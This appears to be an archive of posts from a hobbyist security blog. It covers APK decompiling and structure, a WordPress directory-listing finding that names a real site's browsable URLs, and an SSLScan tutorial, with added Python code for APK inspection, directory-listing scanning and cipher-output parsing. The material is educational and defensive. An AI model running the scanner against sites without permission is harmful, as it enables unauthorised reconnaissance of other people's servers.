<b>2. JD-GUI: a Java decompiler that reconstructs and displays source code from .class files.</b><br />
<b>You can download it from <a href="http://jd.benow.ca/" rel="nofollow" target="_blank">here</a>.</b><br />
<b>So let's start.</b><br />
<br />
<ul style="text-align: left;">
<li><b>Download both tools from the links above and extract dex2jar into a folder.</b></li>
<li><b>There will be several files in the dex2jar folder; two are important: dex2jar.bat for Windows and dex2jar.sh for Linux and macOS (in current dex2jar releases they are named d2j-dex2jar.bat and d2j-dex2jar.sh).</b></li>
<li><b>Now copy the Android APK into the dex2jar folder and open a command prompt at that location.</b></li>
<li><b>In the command prompt type</b></li>
</ul>
<b><u>dex2jar.bat</u> android_package_name.apk</b><div>
<b>and then press Enter.</b></div>
<div>
<b><br /></b></div>
<div>
<ul style="text-align: left;">
<li><b>After this a new file with the .jar extension will be created in the same folder (dex2jar names it after the APK, with a -dex2jar suffix).</b></li>
<li><b>Now open JD-GUI, click File &gt; Open File, and select the .jar file you created above.</b></li>
<li><b>Now you can see the source code of the APK. Keep in mind that it is reconstructed Java: an app obfuscated with ProGuard will show class and method names like a, b, c, and some constructs will not decompile cleanly.</b></li>
</ul>
<b><div>
<b><br /></b></div>
This is a very simple thing that you can do easily, but if you still need a video demonstration, let me know and I will upload one.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Special thanks Gurpreet Singh</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<div>
Jitendra Santram Singh (Team Computer Korner)</div>
<div>
<br />
<b><br /></b>
<b><br /></b>
</div>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Exploring Android: What is an Android APK (published 2016-02-17T12:14:00+05:30, updated 2016-02-17T12:14:26+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Hi ,</b><br />
<b><br /></b>
<b>I have been busy learning new things lately, so here I am with a new post.</b><br />
<b><br /></b>
<b>Android is the OS most people use, so I thought I should write some posts on Android app components. Today I will explore what an Android APK is and what it consists of. So let's start.</b><br />
<b><br /></b>
<b><br /></b>
<h3 style="text-align: left;">
<b>What is an Android App</b></h3>
<div>
<b>An Android app package (APK) is basically a zip archive. You can extract it with any unzip tool, or by renaming the extension from .apk to .zip.</b></div>
<div>
<b>After extracting it, a minimal APK consists of these six folders and files (real apps often add more, for example a lib folder holding native libraries):</b></div>
<div>
<b><br /></b></div>
<br />
<ol style="text-align: left;">
<li><b>res</b></li>
<li><b>META-INF</b></li>
<li><b>assets</b></li>
<li><b>resources.arsc</b></li>
<li><b>classes.dex</b></li>
<li><b>AndroidManifest.xml</b></li>
</ol>
<b>So I will elaborate on what these files and folders contain.</b><br />
<b><br /></b>
<br />
<ul style="text-align: left;">
<li><b>res: This folder holds the app's compiled resources, such as images, layouts and other XML files, that the code references by resource id; the logo or other assets you added to the app end up here.</b></li>
<li><b>META-INF: This folder holds the APK's v1 (JAR-style) signature: MANIFEST.MF with a digest of every file in the archive, CERT.SF with digests of the manifest entries, and CERT.RSA (or .DSA / .EC) with the signature and the signer's certificate. The Main-Class entry that executable JAR files carry plays no role in an APK.</b></li>
<li><b>assets: This folder holds raw files bundled as-is, with no resource ids; the app reads them through AssetManager.</b></li>
<li><b>resources.arsc: The compiled resource table, a binary index of the resources under res, including strings and the mapping from resource ids to files.</b></li>
<li><b>classes.dex: The compiled program code in Dalvik executable format (a large app may also ship classes2.dex, classes3.dex and so on for multidex).</b></li>
<li><b>AndroidManifest.xml: Declares the package name, the permissions the app requests, and the app's components (activities, services, broadcast receivers and content providers), including which of them are exported and the content URI authorities of the providers.</b></li>
</ul>
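The following is an added example (not part of the original post) that shows what you can learn from an APK with nothing but the zip structure: it builds a constructed stand-in APK in memory with the six entries above and the real magic numbers for each format, then inspects it. It also checks the classes.dex header, which is the file the dex2jar step in the earlier post consumes. The sample is not an installable app; its bodies are placeholders.

```python
import io
import struct
import zipfile

# The six entries the post lists; real apps often add more (e.g. lib/ for native code).
EXPECTED_ENTRIES = {"AndroidManifest.xml", "classes.dex", "resources.arsc",
                    "META-INF/", "res/", "assets/"}

def build_sample_apk():
    """Constructed stand-in for a real APK: right entry names and magic numbers, placeholder bodies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # Android binary XML chunk header: type RES_XML_TYPE (0x0003), header size 8, total size
        z.writestr("AndroidManifest.xml", struct.pack("<HHI", 0x0003, 8, 16) + b"\x00" * 8)
        # Dalvik executable magic: "dex\n" + three-digit version + NUL
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 24)
        # Resource table chunk header: type RES_TABLE_TYPE (0x0002), header size 12
        z.writestr("resources.arsc", struct.pack("<HHI", 0x0002, 12, 16) + b"\x00" * 8)
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
        z.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
        z.writestr("META-INF/CERT.RSA", b"\x30\x82\x00\x00")   # PKCS#7 DER starts with SEQUENCE
        z.writestr("res/layout/main.xml", struct.pack("<HHI", 0x0003, 8, 16) + b"\x00" * 8)
        z.writestr("assets/config.json", b'{"debug": false}\n')
    return buf.getvalue()

def top_level_entries(names):
    """Collapse zip entry paths to the APK's top-level files and folders (folders end in '/')."""
    top = set()
    for name in names:
        head, sep, _ = name.partition("/")
        top.add(head + ("/" if sep else ""))
    return sorted(top)

def inspect_apk(apk_bytes):
    """What a plain unzip of an APK tells you before any decompilation."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        top = top_level_entries(names)
        manifest = z.read("AndroidManifest.xml") if "AndroidManifest.xml" in names else b""
        dex_files = sorted(n for n in names if n.startswith("classes") and n.endswith(".dex"))
        dex_magic = z.read(dex_files[0])[:8] if dex_files else b""
        arsc = z.read("resources.arsc") if "resources.arsc" in names else b""
        v1_sig = [n for n in names
                  if n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))]
    return {
        "top_level": top,
        "missing": sorted(EXPECTED_ENTRIES - set(top)),
        # Binary XML is why the manifest is unreadable straight after unzipping.
        "manifest_is_binary_xml": manifest[:4] == b"\x03\x00\x08\x00",
        "resource_table_ok": arsc[:4] == b"\x02\x00\x0c\x00",
        "dex_files": dex_files,
        "dex_version": dex_magic[4:7].decode("ascii") if dex_magic[:4] == b"dex\n" else None,
        "v1_signature_blocks": v1_sig,
    }

if __name__ == "__main__":
    for key, value in inspect_apk(build_sample_apk()).items():
        print(key, "=", value)
```

On a real file, `inspect_apk(open("app.apk", "rb").read())` gives you the same report; an empty `v1_signature_blocks` list on a modern APK usually means it is signed only with the v2/v3 scheme, which lives in the zip's signing block rather than in META-INF.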
<b><br /></b><br />
<b>Note that after just unzipping, the AndroidManifest.xml (and the XML files under res) are in Android's binary XML format, not readable text.</b><br />
<b><br /></b>
<b>So in the next post we will discuss how to decode the binary AndroidManifest.xml.</b><br />
<b><br /></b>
<b>Thats all for this post</b><br />
<b><br /></b>
<b>Special Thanks to Gurpreet Singh </b><br />
<b>Stay tuned </b><br />
<b><br /></b>
<b>Cheers</b><br />
<b>Jitendra K Singh(Team Computer Korner)</b><br />
<b><br /></b>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Update to Computer Korner Android App (published 2016-01-29T12:45:00+05:30, updated 2016-01-29T12:45:29+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi Dear followers</b><br />
<b><br /></b>
<b>Last month we introduced our Android app. It was already a good app, but we have added some new features:</b><br />
<b><br /></b>
<br />
<ul style="text-align: left;">
<li><b>Bug fixes related to the UI</b></li>
<li><b>UI improvements</b></li>
<li><b>Search Bar added </b></li>
</ul>
<b>And many other minor improvements.</b><div>
<b>You can download it from <a href="http://www.mediafire.com/download/5o4ant4chbptjrs/C_Korner.apk" rel="nofollow" target="_blank">here</a>.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Enjoy, and let us know if you want any other improvements added to the app.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Special thanks to Gaurav Arora </b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Cheers</b></div>
<div>
<b>Jitendra Santram Singh ( Team Computer Korner)</b><ul style="text-align: left;">
</ul>
<br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: WordPress Directory Listing : The Story of Cloakfusion Bug (published 2016-01-28T14:46:00+05:30, updated 2016-01-29T12:52:31+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzyH7OHCQ-Cwq7-Q6noB3Wc4GRujOB57om99wZYEJAJO15cX5AH2gz3plkCEgG8pGb3wABsb-Trj5Aq0Jnb8adOjJPblqpeD9C9rcJSaiI3xJqEfCqV8hdmMb1hC7J_Mh1l1jdUHaKChA/s1600/Facebook_Cloaklogo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzyH7OHCQ-Cwq7-Q6noB3Wc4GRujOB57om99wZYEJAJO15cX5AH2gz3plkCEgG8pGb3wABsb-Trj5Aq0Jnb8adOjJPblqpeD9C9rcJSaiI3xJqEfCqV8hdmMb1hC7J_Mh1l1jdUHaKChA/s320/Facebook_Cloaklogo.png" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi Followers</b><br />
<b><br /></b>
<b>Because of the workload I could not update the website for a while, but I am back with my work again.</b><br />
<b><br /></b>
<br />
<h2 style="text-align: left;">
<b>The Story</b></h2>
<div>
<b>So this is the story of a very minor bug which most webmasters forget to patch: the directory listing vulnerability in WordPress. They think they have patched it.</b></div>
<div>
<br /></div>
<div>
But the danger still exists. There are three folders in the WordPress main directory:</div>
<div>
<ul style="text-align: left;">
<li>wp-admin</li>
<li>wp-content</li>
<li>wp-includes</li>
</ul>
What webmasters actually do is deny listing of these three directories only, forgetting that each of them contains further folders. To secure the website they have to disable directory listing for all of the subfolders of these three folders as well; anything browsable under wp-content/uploads, for example, exposes every file users have ever uploaded, and a listing of wp-content/plugins hands an attacker the exact plugin set to look up known vulnerabilities for.</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
The Bug</h2>
<div>
The bug exists here:</div>
<div>
While browsing www.cloakfusion.com I found that it is a WordPress-based website, so first I tried some simple things like accessing the readme.html file, but it was protected, and the three directories were protected as well. After that I browsed the folders inside these three folders.</div>
<div>
</div>
<div>
Then I tried</div>
<div>
<br /></div>
<div>
https://www.cloakfusion.com/wp-content/uploads </div>
<div>
and yes, I could browse it.</div>
<div>
I also tried </div>
<div>
https://www.cloakfusion.com/wp-includes/</div>
<div>
<br /></div>
<div>
and it was also not protected</div>
<div>
Here are the screenshots of both:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSi098K9c9NEn571Ho4GzJRKZ_NQx-NnAXf7w4ROu1uRE6A6hdRA_jmEN8aN183qvgJbc65P7Ue4IYk_6BX7SJcmUUp8TwkEA56eSbAnsVEcnIslFOdA0rH2wdIuN97tgr7I4mpmbNpPs/s1600/cloak2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSi098K9c9NEn571Ho4GzJRKZ_NQx-NnAXf7w4ROu1uRE6A6hdRA_jmEN8aN183qvgJbc65P7Ue4IYk_6BX7SJcmUUp8TwkEA56eSbAnsVEcnIslFOdA0rH2wdIuN97tgr7I4mpmbNpPs/s320/cloak2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6NjKYjLtmvQ9payjoU5vA3tEwJRROrUuWmDjo1ZNLzDJZM0N_FptnGdrSiUF0aUScuusVrq8D1FJGOdmXyCw-729a7Qb5khkuRgIk0qrha-rNNCaYkDA5e1KTSg4X_kiq3zdvPV22Ja0/s1600/cloak.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6NjKYjLtmvQ9payjoU5vA3tEwJRROrUuWmDjo1ZNLzDJZM0N_FptnGdrSiUF0aUScuusVrq8D1FJGOdmXyCw-729a7Qb5khkuRgIk0qrha-rNNCaYkDA5e1KTSg4X_kiq3zdvPV22Ja0/s320/cloak.png" width="320" /></a></div>
<div>
<br /></div>
<h3 style="text-align: left;">
So this has to be patched by disabling directory indexing for these folders and everything under them, for example with Options -Indexes in the .htaccess file on Apache, or the equivalent setting in the web server's own configuration</h3>
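The check above is easy to automate, and the point of the post is that the subfolders have to be tested, not just the three top-level directories. Here is an added example in Python (not from the original post): it builds the candidate URLs, recognises an autoindex page by its markers (Apache's "Index of /" title, nginx's parent-directory link), and runs offline against constructed responses that model the finding described above, with example.com standing in for the real site. The folder list and the markers are assumptions based on default WordPress, Apache and nginx layouts.

```python
import re
from urllib.parse import urljoin

# The three WordPress directories and the subfolders inside them. Checking only the top
# level is the mistake the post describes, so the subfolders are the interesting part.
WP_DIRS = [
    "wp-admin/", "wp-content/", "wp-includes/",
    "wp-admin/css/", "wp-admin/js/", "wp-admin/images/",
    "wp-content/uploads/", "wp-content/plugins/", "wp-content/themes/",
    "wp-includes/js/", "wp-includes/css/", "wp-includes/images/",
]

# Signatures of an autoindex page: Apache's "Index of /" title or heading, nginx's "../" link.
LISTING_MARKERS = (
    re.compile(r"<title>\s*Index of /", re.I),
    re.compile(r"<h1>\s*Index of /", re.I),
    re.compile(r'<a href="\.\./">\s*\.\./?\s*</a>', re.I),
)

def is_directory_listing(status, body):
    return status == 200 and any(marker.search(body) for marker in LISTING_MARKERS)

def candidate_urls(base):
    base = base.rstrip("/") + "/"
    return [urljoin(base, path) for path in WP_DIRS]

def scan(base, fetch):
    """fetch(url) -> (status, body). Injected so the scan runs offline here and against
    a live server with http_fetch below."""
    return [url for url in candidate_urls(base) if is_directory_listing(*fetch(url))]

def http_fetch(url, timeout=10):
    """Live fetcher: status plus the first 64 KiB of the body; HTTP errors return their status."""
    import urllib.request
    import urllib.error
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except urllib.error.URLError:
        return 0, ""

# Constructed responses modelling the post's finding: the top-level folders are denied,
# but wp-includes and wp-content/uploads still list their contents.
CANNED = {
    "https://example.com/wp-admin/": (403, "<h1>Forbidden</h1>"),
    "https://example.com/wp-content/": (403, "<h1>Forbidden</h1>"),
    "https://example.com/wp-includes/": (
        200, "<html><head><title>Index of /wp-includes</title></head>"
             "<body><h1>Index of /wp-includes</h1>...</body></html>"),
    "https://example.com/wp-content/uploads/": (
        200, "<html><head><title>Index of /wp-content/uploads</title></head>"
             "<body>...</body></html>"),
}

def canned_fetch(url):
    return CANNED.get(url, (404, "<h1>Not Found</h1>"))

if __name__ == "__main__":
    print("browsable directories:", scan("https://example.com", canned_fetch))
```

Against a real site, call `scan("https://target.example", http_fetch)` (only with permission). A 403 on the parent and a 200 listing on the child is exactly the pattern to report; the remedy is a server-wide Options -Indexes (or autoindex off on nginx) rather than a rule per folder.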
<div>
Stay tuned, more is coming soon.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Thank You</div>
<div>
Jitendra Santram Singh (Team Computer Korner ) </div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Computer Korner Android App (published 2015-12-27T19:13:00+05:30, updated 2015-12-27T19:26:46+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi dear CK lovers</b><br />
<b><br /></b>
<b>It is a proud moment and my immense pleasure to announce that we now have an Android app.</b><br />
<b><br /></b>
<b>Because of the vast variety of smartphones we thought we should have an Android app too, so here we are with it.</b><br />
<b><br /></b>
<b>You can download our app from here: </b><br />
<a href="http://www.mediafire.com/download/8ia82mw5a8d9myd/computer_korner.apk" rel="nofollow" target="_blank">Click here for app</a><br />
<br />
<br />
For this app I want to thank my best friend Gaurav Arora for his effort in creating it; it was a surprise for the whole Computer Korner team.<br />
<br />
<br />
Regards<br />
Jitendra (Team Computer Korner)<br />
<br />
Special Thanks to Gaurav Arora<br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 3 comments.
Post: WebApp Pentesting: Using SSLScan (published 2015-12-27T19:04:00+05:30, updated 2015-12-27T19:04:45+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixoX3E8r4YZ2U7HP0ckG0mPrwYnlp_HdISNWiD7ii_F2-_egj81OiNGbV082k7tF_zF3bc0aiqUrR2d-EQdHtIdqQXYbB3N14DtwPzXz3lpghZCl2jqE-xyMnxuU924uRmbeCJsytM7YQ/s1600/backbox-2015-12-27-11-20-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixoX3E8r4YZ2U7HP0ckG0mPrwYnlp_HdISNWiD7ii_F2-_egj81OiNGbV082k7tF_zF3bc0aiqUrR2d-EQdHtIdqQXYbB3N14DtwPzXz3lpghZCl2jqE-xyMnxuU924uRmbeCJsytM7YQ/s1600/backbox-2015-12-27-11-20-17.png" /></a></div>
<b><br /></b>
<b>Hi,</b><br />
<b><br /></b>
<b>This is another post in my WebApp pentesting series. It covers how to enumerate the SSL/TLS ciphers a website supports and how to gather information about the SSL certificate the website presents.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
What is SSLScan</h3>
<div>
SSLScan is a very good information-gathering tool: it enumerates the SSL/TLS cipher suites a website accepts and also shows information about the SSL certificate the website presents. That list of accepted protocols and ciphers is what tells you whether the site still allows weak or obsolete configurations.</div>
<div>
<br /></div>
<h3 style="text-align: left;">
How to use SSLScan</h3>
<div>
<br /></div>
<div>
<div>
SSLScan comes pre-installed in major Linux distributions such as BackBox and Kali Linux.</div>
<div>
If it is not pre-installed on your distribution, simply type:</div>
<div>
<br /></div>
<div>
sudo apt-get install sslscan</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOiMtpoA6f9dqn6BWNgBu1x1KXH3TtmapDtrSWnoYlFmXBMKz_wkJbiwnz2oiv_36dttM262qKkoMkDgBP1xKLHedJZ-VZh-q_HnkhyjeBiF8_NT_b_0BUf2Qv6TOM-v9XK1rSXZs9FBc/s1600/backbox-2015-12-27-11-20-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOiMtpoA6f9dqn6BWNgBu1x1KXH3TtmapDtrSWnoYlFmXBMKz_wkJbiwnz2oiv_36dttM262qKkoMkDgBP1xKLHedJZ-VZh-q_HnkhyjeBiF8_NT_b_0BUf2Qv6TOM-v9XK1rSXZs9FBc/s320/backbox-2015-12-27-11-20-17.png" width="320" /></a></div>
<div>
<br /></div>
<div>
Now, to scan a website, simply type the command followed by the hostname you want to check (optionally with a port, e.g. sslscan example.com:443):</div>
<div>
<br /></div>
<div>
sslscan example.com</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0pRQ8miSJoSt5SbdDKpPkYsCM4Xk40l27NzfaHF64oQCWS42jxkzyOgDK7wUMJQA4OhKve9oL-6vnBeA3znBqsNvgwRhG9vpi_nuYsULqUf8LRVYNLoU25p_Maj9t4ANLmUCIokvZXC8/s1600/backbox-2015-12-27-11-20-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0pRQ8miSJoSt5SbdDKpPkYsCM4Xk40l27NzfaHF64oQCWS42jxkzyOgDK7wUMJQA4OhKve9oL-6vnBeA3znBqsNvgwRhG9vpi_nuYsULqUf8LRVYNLoU25p_Maj9t4ANLmUCIokvZXC8/s320/backbox-2015-12-27-11-20-45.png" width="320" /></a></div>
<div>
<br /></div>
<div>
It will start enumerating the ciphers supported by that website, like this: </div>
<div>
<br /></div>
<div>
After that, it will show you the information about the SSL certificate used by the website.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT-y7slXQAMCQYtjzP9N193VV3mLqBHyHinblCIeMwO8Qw9dRzXqL2teEBaihiB3GaNsPOfH7RPei1o83nG7XIC8qKjOl_5D-DWaDvJQL8dpCflZP3_lCXEQbW-iuy4Ypwxeh5_Vmwsak/s1600/backbox-2015-12-27-11-21-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT-y7slXQAMCQYtjzP9N193VV3mLqBHyHinblCIeMwO8Qw9dRzXqL2teEBaihiB3GaNsPOfH7RPei1o83nG7XIC8qKjOl_5D-DWaDvJQL8dpCflZP3_lCXEQbW-iuy4Ypwxeh5_Vmwsak/s320/backbox-2015-12-27-11-21-03.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1DbmNQMK3RBOj_jEfmI6ha1LUPqu_Ss6XcqdV2iWWYTrj5FqHaBpfJEjmBicNMEL_ynaMRKzUw_-_4BQXxvE599ZjgJ97gfOxfy5g2rJmzfL3XsXGYvttLjUDNxwgFGc32DUPde4A0QA/s1600/backbox-2015-12-27-11-21-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1DbmNQMK3RBOj_jEfmI6ha1LUPqu_Ss6XcqdV2iWWYTrj5FqHaBpfJEjmBicNMEL_ynaMRKzUw_-_4BQXxvE599ZjgJ97gfOxfy5g2rJmzfL3XsXGYvttLjUDNxwgFGc32DUPde4A0QA/s320/backbox-2015-12-27-11-21-22.png" width="320" /></a></div>
<div>
<br /></div>
<div>
So with this method you can use sslscan to find out whether a website is exposed to weaknesses that depend on the SSL protocols and ciphers it accepts, such as the POODLE vulnerability and others.</div>
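<div>
The check described above, carried one step further: an added example (not part of the original post and not sslscan's own code) that parses the cipher lines sslscan prints and flags the entries a pentester would report, such as SSLv3 support (POODLE), RC4 and export-grade ciphers. The sample output is constructed, and the "Accepted/Preferred  PROTO  N bits  CIPHER" line layout is an assumption about the scanner's output format.</div>

```python
import re

# Constructed sample of sslscan cipher-enumeration output (not a real scan).
# Assumption: lines look like "Accepted  PROTO  N bits  CIPHER-NAME".
SAMPLE_OUTPUT = """\
Testing SSL server example.test on port 443
  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  SSLv3    128 bits  RC4-SHA
Accepted  SSLv3    40 bits   EXP-RC4-MD5
"""

CIPHER_RE = re.compile(
    r"^\s*(?:Accepted|Preferred)\s+(SSLv2|SSLv3|TLSv1(?:\.[0-3])?)"
    r"\s+(\d+)\s+bits\s+(\S+)", re.MULTILINE)

def parse_ciphers(output):
    """Return (protocol, key_bits, cipher) for every cipher the server accepted."""
    return [(proto, int(bits), cipher)
            for proto, bits, cipher in CIPHER_RE.findall(output)]

def find_weaknesses(output):
    """Return (protocol, cipher, reasons) for each accepted cipher worth reporting."""
    findings = []
    for proto, bits, cipher in parse_ciphers(output):
        reasons = []
        if proto == "SSLv3":
            reasons.append("SSLv3 accepted (POODLE)")
        if proto == "SSLv2":
            reasons.append("SSLv2 accepted (obsolete protocol)")
        if "RC4" in cipher:
            reasons.append("RC4 stream cipher")
        if bits < 128 or cipher.startswith("EXP"):
            reasons.append("export-grade / short key")
        if reasons:
            findings.append((proto, cipher, reasons))
    return findings

if __name__ == "__main__":
    import sys
    # Pipe a real scan in: sslscan example.com | python sslscan_check.py
    text = SAMPLE_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for proto, cipher, reasons in find_weaknesses(text):
        print(f"{proto:8} {cipher:32} {'; '.join(reasons)}")
```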
<div>
<br /></div>
<div>
More tutorials coming soon </div>
<div>
Stay tuned </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Thanks </div>
<div>
Jitendra Singh (Team Computer Korner)</div>
</div>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0